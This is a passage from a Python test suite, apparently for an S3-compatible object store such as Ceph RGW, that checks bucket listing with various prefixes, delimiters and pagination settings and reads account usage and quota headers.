marker = validate_bucket_list(bucket_name, prefix, delim, '', 2, False, ['boo/bar'], ['boo/baz/'], None)
@attr(resource='bucket')
@attr(method='get')
@attr(operation='list')
@attr(assertion='prefixes in multi-component object names')
@attr('list-objects-v2')
def test_bucket_listv2_delimiter_prefix():
bucket_name = _create_objects(keys=['asdf', 'boo/bar', 'boo/baz/xyzzy', 'cquux/thud', 'cquux/bla'])
delim = '/'
continuation_token = ''
prefix = ''
continuation_token = validate_bucket_listv2(bucket_name, prefix, delim, None, 1, True, ['asdf'], [])
continuation_token = validate_bucket_listv2(bucket_name, prefix, delim, continuation_token, 1, True, [], ['boo/'])
continuation_token = validate_bucket_listv2(bucket_name, prefix, delim, continuation_token, 1, False, [], ['cquux/'], last=True)
continuation_token = validate_bucket_listv2(bucket_name, prefix, delim, None, 2, True, ['asdf'], ['boo/'])
continuation_token = validate_bucket_listv2(bucket_name, prefix, delim, continuation_token, 2, False, [], ['cquux/'], last=True)
prefix = 'boo/'
continuation_token = validate_bucket_listv2(bucket_name, prefix, delim, None, 1, True, ['boo/bar'], [])
continuation_token = validate_bucket_listv2(bucket_name, prefix, delim, continuation_token, 1, False, [], ['boo/baz/'], last=True)
continuation_token = validate_bucket_listv2(bucket_name, prefix, delim, None, 2, False, ['boo/bar'], ['boo/baz/'], last=True)
@attr(resource='bucket')
@attr(method='get')
@attr(operation='list')
@attr(assertion='prefix and delimiter handling when object ends with delimiter')
@attr('list-objects-v2')
def test_bucket_listv2_delimiter_prefix_ends_with_delimiter():
bucket_name = _create_objects(keys=['asdf/'])
validate_bucket_listv2(bucket_name, 'asdf/', '/', None, 1000, False, ['asdf/'], [], last=True)
@attr(resource='bucket')
@attr(method='get')
@attr(operation='list')
@attr(assertion='prefix and delimiter handling when object ends with delimiter')
def test_bucket_list_delimiter_prefix_ends_with_delimiter():
bucket_name = _create_objects(keys=['asdf/'])
validate_bucket_list(bucket_name, 'asdf/', '/', '', 1000, False, ['asdf/'], [], None)
@attr(resource='bucket')
@attr(method='get')
@attr(operation='list')
@attr(assertion='non-slash delimiter characters')
def test_bucket_list_delimiter_alt():
bucket_name = _create_objects(keys=['bar', 'baz', 'cab', 'foo'])
client = get_client()
response = client.list_objects(Bucket=bucket_name, Delimiter='a')
eq(response['Delimiter'], 'a')
keys = _get_keys(response)
# foo contains no 'a' and so is a complete key
eq(keys, ['foo'])
# bar, baz, and cab should be broken up by the 'a' delimiters
prefixes = _get_prefixes(response)
eq(len(prefixes), 2)
eq(prefixes, ['ba', 'ca'])
@attr(resource='bucket')
@attr(method='get')
@attr(assertion='non-slash delimiter characters')
@attr('list-objects-v2')
def test_bucket_listv2_delimiter_alt():
bucket_name = _create_objects(keys=['bar', 'baz', 'cab', 'foo'])
client = get_client()
response = client.list_objects_v2(Bucket=bucket_name, Delimiter='a')
eq(response['Delimiter'], 'a')
keys = _get_keys(response)
# foo contains no 'a' and so is a complete key
eq(keys, ['foo'])
# bar, baz, and cab should be broken up by the 'a' delimiters
prefixes = _get_prefixes(response)
eq(len(prefixes), 2)
eq(prefixes, ['ba', 'ca'])
@attr(resource='bucket')
@attr(method='get')
@attr(operation='list')
@attr(assertion='prefixes starting with underscore')
def test_bucket_list_delimiter_prefix_underscore():
bucket_name = _create_objects(keys=['_obj1_','_under1/bar', '_under1/baz/xyzzy', '_under2/thud', '_under2/bla'])
delim = '/'
marker = ''
prefix = ''
marker = validate_bucket_list(bucket_name, prefix, delim, '', 1, True, ['_obj1_'], [], '_obj1_')
marker = validate_bucket_list(bucket_name, prefix, delim, marker, 1, True, [], ['_under1/'], '_under1/')
marker = validate_bucket_list(bucket_name, prefix, delim, marker, 1, False, [], ['_under2/'], None)
marker = validate_bucket_list(bucket_name, prefix, delim, '', 2, True, ['_obj1_'], ['_under1/'], '_under1/')
marker = validate_bucket_list(bucket_name, prefix, delim, marker, 2, False, [], ['_under2/'], None)
prefix = '_under1/'
marker = validate_bucket_list(bucket_name, prefix, delim, '', 1, True, ['_under1/bar'], [], '_under1/bar')
marker = validate_bucket_list(bucket_name, prefix, delim, marker, 1, False, [], ['_under1/baz/'], None)
marker = validate_bucket_list(bucket_name, prefix, delim, '', 2, False, ['_under1/bar'], ['_under1/baz/'], None)
@attr(resource='bucket')
@attr(method='get')
@attr(operation='list')
@attr(assertion='prefixes starting with underscore')
@attr('list-objects-v2')
def test_bucket_listv2_delimiter_prefix_underscore():
bucket_name = _create_objects(keys=['_obj1_','_under1/bar', '_under1/baz/xyzzy', '_under2/thud', '_under2/bla'])
delim = '/'
continuation_token = ''
prefix = ''
continuation_token = validate_bucket_listv2(bucket_name, prefix, delim, None, 1, True, ['_obj1_'], [])
continuation_token = validate_bucket_listv2(bucket_name, prefix, delim, continuation_token , 1, True, [], ['_under1/'])
continuation_token = validate_bucket_listv2(bucket_name, prefix, delim, continuation_token , 1, False, [], ['_under2/'], last=True)
continuation_token = validate_bucket_listv2(bucket_name, prefix, delim, None, 2, True, ['_obj1_'], ['_under1/'])
continuation_token = validate_bucket_listv2(bucket_name, prefix, delim, continuation_token , 2, False, [], ['_under2/'], last=True)
prefix = '_under1/'
continuation_token = validate_bucket_listv2(bucket_name, prefix, delim, None, 1, True, ['_under1/bar'], [])
continuation_token = validate_bucket_listv2(bucket_name, prefix, delim, continuation_token , 1, False, [], ['_under1/baz/'], last=True)
continuation_token = validate_bucket_listv2(bucket_name, prefix, delim, None, 2, False, ['_under1/bar'], ['_under1/baz/'], last=True)
@attr(resource='bucket')
@attr(method='get')
@attr(operation='list')
@attr(assertion='percentage delimiter characters')
def test_bucket_list_delimiter_percentage():
bucket_name = _create_objects(keys=['b%ar', 'b%az', 'c%ab', 'foo'])
client = get_client()
response = client.list_objects(Bucket=bucket_name, Delimiter='%')
eq(response['Delimiter'], '%')
keys = _get_keys(response)
# foo contains no 'a' and so is a complete key
eq(keys, ['foo'])
prefixes = _get_prefixes(response)
eq(len(prefixes), 2)
# bar, baz, and cab should be broken up by the 'a' delimiters
eq(prefixes, ['b%', 'c%'])
@attr(resource='bucket')
@attr(method='get')
@attr(assertion='percentage delimiter characters')
@attr('list-objects-v2')
def test_bucket_listv2_delimiter_percentage():
bucket_name = _create_objects(keys=['b%ar', 'b%az', 'c%ab', 'foo'])
client = get_client()
response = client.list_objects_v2(Bucket=bucket_name, Delimiter='%')
eq(response['Delimiter'], '%')
keys = _get_keys(response)
# foo contains no 'a' and so is a complete key
eq(keys, ['foo'])
prefixes = _get_prefixes(response)
eq(len(prefixes), 2)
# bar, baz, and cab should be broken up by the 'a' delimiters
eq(prefixes, ['b%', 'c%'])
@attr(resource='bucket')
@attr(method='get')
@attr(operation='list')
@attr(assertion='whitespace delimiter characters')
def test_bucket_list_delimiter_whitespace():
bucket_name = _create_objects(keys=['b ar', 'b az', 'c ab', 'foo'])
client = get_client()
response = client.list_objects(Bucket=bucket_name, Delimiter=' ')
eq(response['Delimiter'], ' ')
keys = _get_keys(response)
# foo contains no 'a' and so is a complete key
eq(keys, ['foo'])
prefixes = _get_prefixes(response)
eq(len(prefixes), 2)
# bar, baz, and cab should be broken up by the 'a' delimiters
eq(prefixes, ['b ', 'c '])
@attr(resource='bucket')
@attr(method='get')
@attr(assertion='whitespace delimiter characters')
@attr('list-objects-v2')
def test_bucket_listv2_delimiter_whitespace():
bucket_name = _create_objects(keys=['b ar', 'b az', 'c ab', 'foo'])
client = get_client()
response = client.list_objects_v2(Bucket=bucket_name, Delimiter=' ')
eq(response['Delimiter'], ' ')
keys = _get_keys(response)
# foo contains no 'a' and so is a complete key
eq(keys, ['foo'])
prefixes = _get_prefixes(response)
eq(len(prefixes), 2)
# bar, baz, and cab should be broken up by the 'a' delimiters
eq(prefixes, ['b ', 'c '])
@attr(resource='bucket')
@attr(method='get')
@attr(operation='list')
@attr(assertion='dot delimiter characters')
def test_bucket_list_delimiter_dot():
bucket_name = _create_objects(keys=['b.ar', 'b.az', 'c.ab', 'foo'])
client = get_client()
response = client.list_objects(Bucket=bucket_name, Delimiter='.')
eq(response['Delimiter'], '.')
keys = _get_keys(response)
# foo contains no 'a' and so is a complete key
eq(keys, ['foo'])
prefixes = _get_prefixes(response)
eq(len(prefixes), 2)
# bar, baz, and cab should be broken up by the 'a' delimiters
eq(prefixes, ['b.', 'c.'])
@attr(resource='bucket')
@attr(method='get')
@attr(assertion='dot delimiter characters')
@attr('list-objects-v2')
def test_bucket_listv2_delimiter_dot():
bucket_name = _create_objects(keys=['b.ar', 'b.az', 'c.ab', 'foo'])
client = get_client()
response = client.list_objects_v2(Bucket=bucket_name, Delimiter='.')
eq(response['Delimiter'], '.')
keys = _get_keys(response)
# foo contains no 'a' and so is a complete key
eq(keys, ['foo'])
prefixes = _get_prefixes(response)
eq(len(prefixes), 2)
# bar, baz, and cab should be broken up by the 'a' delimiters
eq(prefixes, ['b.', 'c.'])
@attr(resource='bucket')
@attr(method='get')
@attr(operation='list')
@attr(assertion='non-printable delimiter can be specified')
def test_bucket_list_delimiter_unreadable():
key_names=['bar', 'baz', 'cab', 'foo']
bucket_name = _create_objects(keys=key_names)
client = get_client()
response = client.list_objects(Bucket=bucket_name, Delimiter='\x0a')
eq(response['Delimiter'], '\x0a')
keys = _get_keys(response)
prefixes = _get_prefixes(response)
eq(keys, key_names)
eq(prefixes, [])
@attr(resource='bucket')
@attr(method='get')
@attr(assertion='non-printable delimiter can be specified')
@attr('list-objects-v2')
def test_bucket_listv2_delimiter_unreadable():
key_names=['bar', 'baz', 'cab', 'foo']
bucket_name = _create_objects(keys=key_names)
client = get_client()
response = client.list_objects_v2(Bucket=bucket_name, Delimiter='\x0a')
eq(response['Delimiter'], '\x0a')
keys = _get_keys(response)
prefixes = _get_prefixes(response)
eq(keys, key_names)
eq(prefixes, [])
@attr(resource='bucket')
@attr(method='get')
@attr(operation='list')
@attr(assertion='empty delimiter can be specified')
def test_bucket_list_delimiter_empty():
key_names = ['bar', 'baz', 'cab', 'foo']
bucket_name = _create_objects(keys=key_names)
client = get_client()
response = client.list_objects(Bucket=bucket_name, Delimiter='')
# putting an empty value into Delimiter will not return a value in the response
eq('Delimiter' in response, False)
keys = _get_keys(response)
prefixes = _get_prefixes(response)
eq(keys, key_names)
eq(prefixes, [])
@attr(resource='bucket')
@attr(method='get')
@attr(assertion='empty delimiter can be specified')
@attr('list-objects-v2')
def test_bucket_listv2_delimiter_empty():
key_names = ['bar', 'baz', 'cab', 'foo']
bucket_name = _create_objects(keys=key_names)
client = get_client()
response = client.list_objects_v2(Bucket=bucket_name, Delimiter='')
# putting an empty value into Delimiter will not return a value in the response
eq('Delimiter' in response, False)
keys = _get_keys(response)
prefixes = _get_prefixes(response)
eq(keys, key_names)
eq(prefixes, [])
@attr(resource='bucket')
@attr(method='get')
@attr(operation='list')
@attr(assertion='unspecified delimiter defaults to none')
def test_bucket_list_delimiter_none():
key_names = ['bar', 'baz', 'cab', 'foo']
bucket_name = _create_objects(keys=key_names)
client = get_client()
response = client.list_objects(Bucket=bucket_name)
# putting an empty value into Delimiter will not return a value in the response
eq('Delimiter' in response, False)
keys = _get_keys(response)
prefixes = _get_prefixes(response)
eq(keys, key_names)
eq(prefixes, [])
@attr(resource='bucket')
@attr(method='get')
@attr(assertion='unspecified delimiter defaults to none')
@attr('list-objects-v2')
def test_bucket_listv2_delimiter_none():
key_names = ['bar', 'baz', 'cab', 'foo']
bucket_name = _create_objects(keys=key_names)
client = get_client()
response = client.list_objects_v2(Bucket=bucket_name)
# putting an empty value into Delimiter will not return a value in the response
eq('Delimiter' in response, False)
keys = _get_keys(response)
prefixes = _get_prefixes(response)
eq(keys, key_names)
eq(prefixes, [])
@attr('list-objects-v2')
def test_bucket_listv2_fetchowner_notempty():
key_names = ['foo/bar', 'foo/baz', 'quux']
bucket_name = _create_objects(keys=key_names)
client = get_client()
response = client.list_objects_v2(Bucket=bucket_name, FetchOwner=True)
objs_list = response['Contents']
eq('Owner' in objs_list[0], True)
@attr('list-objects-v2')
def test_bucket_listv2_fetchowner_defaultempty():
key_names = ['foo/bar', 'foo/baz', 'quux']
bucket_name = _create_objects(keys=key_names)
client = get_client()
response = client.list_objects_v2(Bucket=bucket_name)
objs_list = response['Contents']
eq('Owner' in objs_list[0], False)
@attr('list-objects-v2')
def test_bucket_listv2_fetchowner_empty():
key_names = ['foo/bar', 'foo/baz', 'quux']
bucket_name = _create_objects(keys=key_names)
client = get_client()
response = client.list_objects_v2(Bucket=bucket_name, FetchOwner= False)
objs_list = response['Contents']
eq('Owner' in objs_list[0], False)
@attr(resource='bucket')
@attr(method='get')
@attr(operation='list')
@attr(assertion='unused delimiter is not found')
def test_bucket_list_delimiter_not_exist():
key_names = ['bar', 'baz', 'cab', 'foo']
bucket_name = _create_objects(keys=key_names)
client = get_client()
response = client.list_objects(Bucket=bucket_name, Delimiter='/')
# putting an empty value into Delimiter will not return a value in the response
eq(response['Delimiter'], '/')
keys = _get_keys(response)
prefixes = _get_prefixes(response)
eq(keys, key_names)
eq(prefixes, [])
@attr(resource='bucket')
@attr(method='get')
@attr(assertion='unused delimiter is not found')
@attr('list-objects-v2')
def test_bucket_listv2_delimiter_not_exist():
key_names = ['bar', 'baz', 'cab', 'foo']
bucket_name = _create_objects(keys=key_names)
client = get_client()
response = client.list_objects_v2(Bucket=bucket_name, Delimiter='/')
# putting an empty value into Delimiter will not return a value in the response
eq(response['Delimiter'], '/')
keys = _get_keys(response)
prefixes = _get_prefixes(response)
eq(keys, key_names)
eq(prefixes, [])
@attr(resource='bucket')
@attr(method='get')
@attr(operation='list')
@attr(assertion='list with delimiter not skip special keys')
def test_bucket_list_delimiter_not_skip_special():
key_names = ['0/'] + ['0/%s' % i for i in range(1000, 1999)]
key_names2 = ['1999', '1999#', '1999+', '2000']
key_names += key_names2
bucket_name = _create_objects(keys=key_names)
client = get_client()
response = client.list_objects(Bucket=bucket_name, Delimiter='/')
eq(response['Delimiter'], '/')
keys = _get_keys(response)
prefixes = _get_prefixes(response)
eq(keys, key_names2)
eq(prefixes, ['0/'])
@attr(resource='bucket')
@attr(method='get')
@attr(operation='list under prefix')
@attr(assertion='returns only objects under prefix')
def test_bucket_list_prefix_basic():
key_names = ['foo/bar', 'foo/baz', 'quux']
bucket_name = _create_objects(keys=key_names)
client = get_client()
response = client.list_objects(Bucket=bucket_name, Prefix='foo/')
eq(response['Prefix'], 'foo/')
keys = _get_keys(response)
prefixes = _get_prefixes(response)
eq(keys, ['foo/bar', 'foo/baz'])
eq(prefixes, [])
@attr(resource='bucket')
@attr(method='get')
@attr(operation='list under prefix with list-objects-v2')
@attr(assertion='returns only objects under prefix')
@attr('list-objects-v2')
def test_bucket_listv2_prefix_basic():
key_names = ['foo/bar', 'foo/baz', 'quux']
bucket_name = _create_objects(keys=key_names)
client = get_client()
response = client.list_objects_v2(Bucket=bucket_name, Prefix='foo/')
eq(response['Prefix'], 'foo/')
keys = _get_keys(response)
prefixes = _get_prefixes(response)
eq(keys, ['foo/bar', 'foo/baz'])
eq(prefixes, [])
# just testing that we can do the delimeter and prefix logic on non-slashes
@attr(resource='bucket')
@attr(method='get')
@attr(operation='list under prefix')
@attr(assertion='prefixes w/o delimiters')
def test_bucket_list_prefix_alt():
key_names = ['bar', 'baz', 'foo']
bucket_name = _create_objects(keys=key_names)
client = get_client()
response = client.list_objects(Bucket=bucket_name, Prefix='ba')
eq(response['Prefix'], 'ba')
keys = _get_keys(response)
prefixes = _get_prefixes(response)
eq(keys, ['bar', 'baz'])
eq(prefixes, [])
@attr(resource='bucket')
@attr(method='get')
@attr(operation='list under prefix with list-objects-v2')
@attr(assertion='prefixes w/o delimiters')
@attr('list-objects-v2')
def test_bucket_listv2_prefix_alt():
key_names = ['bar', 'baz', 'foo']
bucket_name = _create_objects(keys=key_names)
client = get_client()
response = client.list_objects_v2(Bucket=bucket_name, Prefix='ba')
eq(response['Prefix'], 'ba')
keys = _get_keys(response)
prefixes = _get_prefixes(response)
eq(keys, ['bar', 'baz'])
eq(prefixes, [])
@attr(resource='bucket')
@attr(method='get')
@attr(operation='list under prefix')
@attr(assertion='empty prefix returns everything')
def test_bucket_list_prefix_empty():
key_names = ['foo/bar', 'foo/baz', 'quux']
bucket_name = _create_objects(keys=key_names)
client = get_client()
response = client.list_objects(Bucket=bucket_name, Prefix='')
eq(response['Prefix'], '')
keys = _get_keys(response)
prefixes = _get_prefixes(response)
eq(keys, key_names)
eq(prefixes, [])
@attr(resource='bucket')
@attr(method='get')
@attr(operation='list under prefix with list-objects-v2')
@attr(assertion='empty prefix returns everything')
@attr('list-objects-v2')
def test_bucket_listv2_prefix_empty():
key_names = ['foo/bar', 'foo/baz', 'quux']
bucket_name = _create_objects(keys=key_names)
client = get_client()
response = client.list_objects_v2(Bucket=bucket_name, Prefix='')
eq(response['Prefix'], '')
keys = _get_keys(response)
prefixes = _get_prefixes(response)
eq(keys, key_names)
eq(prefixes, [])
@attr(resource='bucket')
@attr(method='get')
@attr(operation='list under prefix')
@attr(assertion='unspecified prefix returns everything')
def test_bucket_list_prefix_none():
key_names = ['foo/bar', 'foo/baz', 'quux']
bucket_name = _create_objects(keys=key_names)
client = get_client()
response = client.list_objects(Bucket=bucket_name, Prefix='')
eq(response['Prefix'], '')
keys = _get_keys(response)
prefixes = _get_prefixes(response)
eq(keys, key_names)
eq(prefixes, [])
@attr(resource='bucket')
@attr(method='get')
@attr(operation='list under prefix with list-objects-v2')
@attr(assertion='unspecified prefix returns everything')
@attr('list-objects-v2')
def test_bucket_listv2_prefix_none():
key_names = ['foo/bar', 'foo/baz', 'quux']
bucket_name = _create_objects(keys=key_names)
client = get_client()
response = client.list_objects_v2(Bucket=bucket_name, Prefix='')
eq(response['Prefix'], '')
keys = _get_keys(response)
prefixes = _get_prefixes(response)
eq(keys, key_names)
eq(prefixes, [])
@attr(resource='bucket')
@attr(method='get')
@attr(operation='list under prefix')
@attr(assertion='nonexistent prefix returns nothing')
def test_bucket_list_prefix_not_exist():
key_names = ['foo/bar', 'foo/baz', 'quux']
bucket_name = _create_objects(keys=key_names)
client = get_client()
response = client.list_objects(Bucket=bucket_name, Prefix='d')
eq(response['Prefix'], 'd')
keys = _get_keys(response)
prefixes = _get_prefixes(response)
eq(keys, [])
eq(prefixes, [])
@attr(resource='bucket')
@attr(method='get')
@attr(operation='list under prefix with list-objects-v2')
@attr(assertion='nonexistent prefix returns nothing')
@attr('list-objects-v2')
def test_bucket_listv2_prefix_not_exist():
key_names = ['foo/bar', 'foo/baz', 'quux']
bucket_name = _create_objects(keys=key_names)
client = get_client()
response = client.list_objects_v2(Bucket=bucket_name, Prefix='d')
eq(response['Prefix'], 'd')
keys = _get_keys(response)
prefixes = _get_prefixes(response)
eq(keys, [])
eq(prefixes, [])
@attr(resource='bucket')
@attr(method='get')
@attr(operation='list under prefix')
@attr(assertion='non-printable prefix can be specified')
def test_bucket_list_prefix_unreadable():
key_names = ['foo/bar', 'foo/baz', 'quux']
bucket_name = _create_objects(keys=key_names)
client = get_client()
response = client.list_objects(Bucket=bucket_name, Prefix='\x0a')
eq(response['Prefix'], '\x0a')
keys = _get_keys(response)
prefixes = _get_prefixes(response)
eq(keys, [])
eq(prefixes, [])
@attr(resource='bucket')
@attr(method='get')
@attr(operation='list under prefix with list-objects-v2')
@attr(assertion='non-printable prefix can be specified')
@attr('list-objects-v2')
def test_bucket_listv2_prefix_unreadable():
key_names = ['foo/bar', 'foo/baz', 'quux']
bucket_name = _create_objects(keys=key_names)
client = get_client()
response = client.list_objects_v2(Bucket=bucket_name, Prefix='\x0a')
eq(response['Prefix'], '\x0a')
keys = _get_keys(response)
prefixes = _get_prefixes(response)
eq(keys, [])
eq(prefixes, [])
@attr(resource='bucket')
@attr(method='get')
@attr(operation='list under prefix w/delimiter')
@attr(assertion='returns only objects directly under prefix')
def test_bucket_list_prefix_delimiter_basic():
key_names = ['foo/bar', 'foo/baz/xyzzy', 'quux/thud', 'asdf']
bucket_name = _create_objects(keys=key_names)
client = get_client()
response = client.list_objects(Bucket=bucket_name, Delimiter='/', Prefix='foo/')
eq(response['Prefix'], 'foo/')
eq(response['Delimiter'], '/')
keys = _get_keys(response)
prefixes = _get_prefixes(response)
eq(keys, ['foo/bar'])
eq(prefixes, ['foo/baz/'])
@attr(resource='bucket')
@attr(method='get')
@attr(operation='list-objects-v2 under prefix w/delimiter')
@attr(assertion='returns only objects directly under prefix')
@attr('list-objects-v2')
def test_bucket_listv2_prefix_delimiter_basic():
key_names = ['foo/bar', 'foo/baz/xyzzy', 'quux/thud', 'asdf']
bucket_name = _create_objects(keys=key_names)
client = get_client()
response = client.list_objects_v2(Bucket=bucket_name, Delimiter='/', Prefix='foo/')
eq(response['Prefix'], 'foo/')
eq(response['Delimiter'], '/')
keys = _get_keys(response)
prefixes = _get_prefixes(response)
eq(keys, ['foo/bar'])
eq(prefixes, ['foo/baz/'])
@attr(resource='bucket')
@attr(method='get')
@attr(operation='list under prefix w/delimiter')
@attr(assertion='non-slash delimiters')
def test_bucket_list_prefix_delimiter_alt():
key_names = ['bar', 'bazar', 'cab', 'foo']
bucket_name = _create_objects(keys=key_names)
client = get_client()
response = client.list_objects(Bucket=bucket_name, Delimiter='a', Prefix='ba')
eq(response['Prefix'], 'ba')
eq(response['Delimiter'], 'a')
keys = _get_keys(response)
prefixes = _get_prefixes(response)
eq(keys, ['bar'])
eq(prefixes, ['baza'])
@attr('list-objects-v2')
def test_bucket_listv2_prefix_delimiter_alt():
key_names = ['bar', 'bazar', 'cab', 'foo']
bucket_name = _create_objects(keys=key_names)
client = get_client()
response = client.list_objects_v2(Bucket=bucket_name, Delimiter='a', Prefix='ba')
eq(response['Prefix'], 'ba')
eq(response['Delimiter'], 'a')
keys = _get_keys(response)
prefixes = _get_prefixes(response)
eq(keys, ['bar'])
eq(prefixes, ['baza'])
@attr(resource='bucket')
@attr(method='get')
@attr(operation='list under prefix w/delimiter')
@attr(assertion='finds nothing w/unmatched prefix')
def test_bucket_list_prefix_delimiter_prefix_not_exist():
key_names = ['b/a/r', 'b/a/c', 'b/a/g', 'g']
bucket_name = _create_objects(keys=key_names)
client = get_client()
response = client.list_objects(Bucket=bucket_name, Delimiter='d', Prefix='/')
keys = _get_keys(response)
prefixes = _get_prefixes(response)
eq(keys, [])
eq(prefixes, [])
@attr(resource='bucket')
@attr(method='get')
@attr(operation='list-objects-v2 under prefix w/delimiter')
@attr(assertion='finds nothing w/unmatched prefix')
@attr('list-objects-v2')
def test_bucket_listv2_prefix_delimiter_prefix_not_exist():
key_names = ['b/a/r', 'b/a/c', 'b/a/g', 'g']
bucket_name = _create_objects(keys=key_names)
client = get_client()
response = client.list_objects_v2(Bucket=bucket_name, Delimiter='d', Prefix='/')
keys = _get_keys(response)
prefixes = _get_prefixes(response)
eq(keys, [])
eq(prefixes, [])
@attr(resource='bucket')
@attr(method='get')
@attr(operation='list under prefix w/delimiter')
@attr(assertion='over-ridden slash ceases to be a delimiter')
def test_bucket_list_prefix_delimiter_delimiter_not_exist():
key_names = ['b/a/c', 'b/a/g', 'b/a/r', 'g']
bucket_name = _create_objects(keys=key_names)
client = get_client()
response = client.list_objects(Bucket=bucket_name, Delimiter='z', Prefix='b')
keys = _get_keys(response)
prefixes = _get_prefixes(response)
eq(keys, ['b/a/c', 'b/a/g', 'b/a/r'])
eq(prefixes, [])
@attr(resource='bucket')
@attr(method='get')
@attr(operation='list-objects-v2 under prefix w/delimiter')
@attr(assertion='over-ridden slash ceases to be a delimiter')
@attr('list-objects-v2')
def test_bucket_listv2_prefix_delimiter_delimiter_not_exist():
key_names = ['b/a/c', 'b/a/g', 'b/a/r', 'g']
bucket_name = _create_objects(keys=key_names)
client = get_client()
response = client.list_objects_v2(Bucket=bucket_name, Delimiter='z', Prefix='b')
keys = _get_keys(response)
prefixes = _get_prefixes(response)
eq(keys, ['b/a/c', 'b/a/g', 'b/a/r'])
eq(prefixes, [])
@attr(resource='bucket')
@attr(method='get')
@attr(operation='list under prefix w/delimiter')
@attr(assertion='finds nothing w/unmatched prefix and delimiter')
def test_bucket_list_prefix_delimiter_prefix_delimiter_not_exist():
key_names = ['b/a/c', 'b/a/g', 'b/a/r', 'g']
bucket_name = _create_objects(keys=key_names)
client = get_client()
response = client.list_objects(Bucket=bucket_name, Delimiter='z', Prefix='y')
keys = _get_keys(response)
prefixes = _get_prefixes(response)
eq(keys, [])
eq(prefixes, [])
@attr(resource='bucket')
@attr(method='get')
@attr(operation='list-objects-v2 under prefix w/delimiter')
@attr(assertion='finds nothing w/unmatched prefix and delimiter')
@attr('list-objects-v2')
def test_bucket_listv2_prefix_delimiter_prefix_delimiter_not_exist():
key_names = ['b/a/c', 'b/a/g', 'b/a/r', 'g']
bucket_name = _create_objects(keys=key_names)
client = get_client()
response = client.list_objects_v2(Bucket=bucket_name, Delimiter='z', Prefix='y')
keys = _get_keys(response)
prefixes = _get_prefixes(response)
eq(keys, [])
eq(prefixes, [])
@attr(resource='bucket')
@attr(method='get')
@attr(operation='list all keys')
@attr(assertion='pagination w/max_keys=1, marker')
def test_bucket_list_maxkeys_one():
key_names = ['bar', 'baz', 'foo', 'quxx']
bucket_name = _create_objects(keys=key_names)
client = get_client()
response = client.list_objects(Bucket=bucket_name, MaxKeys=1)
eq(response['IsTruncated'], True)
keys = _get_keys(response)
eq(keys, key_names[0:1])
response = client.list_objects(Bucket=bucket_name, Marker=key_names[0])
eq(response['IsTruncated'], False)
keys = _get_keys(response)
eq(keys, key_names[1:])
@attr(resource='bucket')
@attr(method='get')
@attr(operation='list all keys with list-objects-v2')
@attr(assertion='pagination w/max_keys=1, marker')
@attr('list-objects-v2')
def test_bucket_listv2_maxkeys_one():
key_names = ['bar', 'baz', 'foo', 'quxx']
bucket_name = _create_objects(keys=key_names)
client = get_client()
response = client.list_objects_v2(Bucket=bucket_name, MaxKeys=1)
eq(response['IsTruncated'], True)
keys = _get_keys(response)
eq(keys, key_names[0:1])
response = client.list_objects_v2(Bucket=bucket_name, StartAfter=key_names[0])
eq(response['IsTruncated'], False)
keys = _get_keys(response)
eq(keys, key_names[1:])
@attr(resource='bucket')
@attr(method='get')
@attr(operation='list all keys')
@attr(assertion='pagination w/max_keys=0')
def test_bucket_list_maxkeys_zero():
key_names = ['bar', 'baz', 'foo', 'quxx']
bucket_name = _create_objects(keys=key_names)
client = get_client()
response = client.list_objects(Bucket=bucket_name, MaxKeys=0)
eq(response['IsTruncated'], False)
keys = _get_keys(response)
eq(keys, [])
@attr(resource='bucket')
@attr(method='get')
@attr(operation='list all keys with list-objects-v2')
@attr(assertion='pagination w/max_keys=0')
@attr('list-objects-v2')
def test_bucket_listv2_maxkeys_zero():
key_names = ['bar', 'baz', 'foo', 'quxx']
bucket_name = _create_objects(keys=key_names)
client = get_client()
response = client.list_objects_v2(Bucket=bucket_name, MaxKeys=0)
eq(response['IsTruncated'], False)
keys = _get_keys(response)
eq(keys, [])
@attr(resource='bucket')
@attr(method='get')
@attr(operation='list all keys')
@attr(assertion='pagination w/o max_keys')
def test_bucket_list_maxkeys_none():
key_names = ['bar', 'baz', 'foo', 'quxx']
bucket_name = _create_objects(keys=key_names)
client = get_client()
response = client.list_objects(Bucket=bucket_name)
eq(response['IsTruncated'], False)
keys = _get_keys(response)
eq(keys, key_names)
eq(response['MaxKeys'], 1000)
@attr(resource='bucket')
@attr(method='get')
@attr(operation='list all keys with list-objects-v2')
@attr(assertion='pagination w/o max_keys')
@attr('list-objects-v2')
def test_bucket_listv2_maxkeys_none():
key_names = ['bar', 'baz', 'foo', 'quxx']
bucket_name = _create_objects(keys=key_names)
client = get_client()
response = client.list_objects_v2(Bucket=bucket_name)
eq(response['IsTruncated'], False)
keys = _get_keys(response)
eq(keys, key_names)
eq(response['MaxKeys'], 1000)
def get_http_response_body(**kwargs):
global http_response_body
http_response_body = kwargs['http_response'].__dict__['_content']
def parseXmlToJson(xml):
response = {}
for child in list(xml):
if len(list(child)) > 0:
response[child.tag] = parseXmlToJson(child)
else:
response[child.tag] = child.text or ''
# one-liner equivalent
# response[child.tag] = parseXmlToJson(child) if len(list(child)) > 0 else child.text or ''
return response
@attr(resource='bucket')
@attr(method='get')
@attr(operation='get usage by client')
@attr(assertion='account usage api')
@attr('fails_on_aws') # allow-unordered is a non-standard extension
def test_account_usage():
# boto3.set_stream_logger(name='botocore')
client = get_client()
# adds the unordered query parameter
def add_usage(**kwargs):
kwargs['params']['url'] += "?usage"
client.meta.events.register('before-call.s3.ListBuckets', add_usage)
client.meta.events.register('after-call.s3.ListBuckets', get_http_response_body)
client.list_buckets()
xml = ET.fromstring(http_response_body.decode('utf-8'))
parsed = parseXmlToJson(xml)
summary = parsed['Summary']
eq(summary['QuotaMaxBytes'], '-1')
eq(summary['QuotaMaxBuckets'], '1000')
eq(summary['QuotaMaxObjCount'], '-1')
eq(summary['QuotaMaxBytesPerBucket'], '-1')
eq(summary['QuotaMaxObjCountPerBucket'], '-1')
@attr(resource='bucket')
@attr(method='head')
@attr(operation='get usage by client')
@attr(assertion='account usage by head bucket')
@attr('fails_on_aws') # allow-unordered is a non-standard extension
def test_head_bucket_usage():
# boto3.set_stream_logger(name='botocore')
client = get_client()
bucket_name = _create_objects(keys=['foo'])
# adds the unordered query parameter
client.meta.events.register('after-call.s3.HeadBucket', get_http_response)
client.head_bucket(Bucket=bucket_name)
hdrs = http_response['headers']
eq(hdrs['X-RGW-Object-Count'], '1')
eq(hdrs['X-RGW-Bytes-Used'], '3')
eq(hdrs['X-RGW-Quota-User-Size'], '-1')
eq(hdrs['X-RGW-Quota-User-Objects'], '-1')
eq(hdrs['X-RGW-Quota-Max-Buckets'], '1000')
eq(hdrs['X-RGW-Quota-Bucket-Size'], '-1')
